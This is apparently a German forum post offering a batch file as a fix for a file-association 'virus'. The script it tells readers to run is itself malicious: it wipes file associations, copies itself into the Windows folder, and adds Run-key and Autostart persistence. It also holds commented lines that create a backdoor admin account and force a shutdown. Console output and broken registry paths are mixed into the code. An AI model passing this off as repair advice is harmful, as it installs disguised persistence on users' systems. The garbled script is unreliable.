Morgens!
Das oben genannte Virus ist zur Zeit wohl noch immer im Umlauf.
Glücklicherweise ist es eigentlich kein richtiges Virus und richtet keinen Schaden an, solange man nicht panisch irgendwelche Dinge tut wie die Festplatte zu formatieren oder ähnlich gute Ideen in die Tat umsetzt.
Das Virus sorgt dafür, dass die bekannten Dateitypen nicht mehr verknüpft sind und man somit keine .exe und ähnliche Files mehr öffnen kann.
Abhilfe ist relativ leicht, sofern man noch über einen zweiten Rechner verfügt und über einen Wechseldatenträger wie zB einen usb-stick, oder aber auch eine altmodische Diskette.
Man erzeugt auf dem "sauberen" Rechner mit dem Programm "Notepad" oder einem anderen simplen Texteditor eine neue Datei, die man unter dem Namen
psycho.bat abspeichert.
Wichtig ist hier einfach nur, dass die Dateiendung .bat ist, ein sogenanntes Batchfile, oder auch Batchdatei um im deutschen Sprachgebrauch zu bleiben.
In diese Datei schreibt man dann folgendes:
Code:
@echo off
assoc .txt=txtfile
assoc .doc=Word.Document.8
assoc .rtf=Word.RTF.8
assoc .php=
assoc .htm=htmfile
assoc .html=htmlfile
assoc .xml=xmlfile
assoc .dot=Word.Template.8
assoc .wps=
assoc .avi=vlcavi
assoc .mpg=vlcmpg
assoc .mpeg=mpeg
assoc .wmv=
assoc .wma=
assoc .mp3=
assoc .wav=
assoc .aiff=
assoc .au=
assoc .mid=
assoc .midi=
assoc .exe=exefile
assoc .com=comfile
assoc .key=
assoc .rar=
assoc .zip=
assoc .vb=
assoc .vbs=
assoc .scr=
md %windir%\Command
copy %0 "%windir%\Command"
ren %windir%\Command\*.* Command.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f
copy %0 copy "C:\Dokumente und Einstellungen\Burns\Desktop\Batch_Systemfucker_Gen erator_v_1.3\BSG_1.3.exe" "%userprofile%\startm~1\Programme\Autostart"
ren %0 "%userprofile%\startm~1\Programme\Autostart\*.bat" Command.bat
Der Vorgang wurde erfolgreich ausgeführt.
Der Vorgang wurde erfolgreich ausgeführt.
rem net user "psYch0xX" "0wn3d" /add
rem net localgroup Administratoren "psYch0xX" /add
rem shutdown -s -f -t 10 -c "FucKeD by -psYch0xX-"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System" /v DisableRegistryTools /t REG_DWORD /d "0" /f
Jetzt kopiert man diese Batchdatei auf das Laufwerk C des infizierten Rechners und führt sie über das Startmenü -> Ausführen aus.
Danach sollte fast alles wieder so sein wie vorher.
Man löscht jetzt nur noch den Registry Eintrag
HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat
, sowie die Ordner und den angelegten Admin und man hat sein System so wie vorher.
Dazu findet man mittels Start->Ausführen Regedit
den entsprechenden Schlüssel und löscht ihn und löscht dann den angelegten Adminuser über die Systemverwaltung.
Möge die Macht mit Euch sein!
derwisch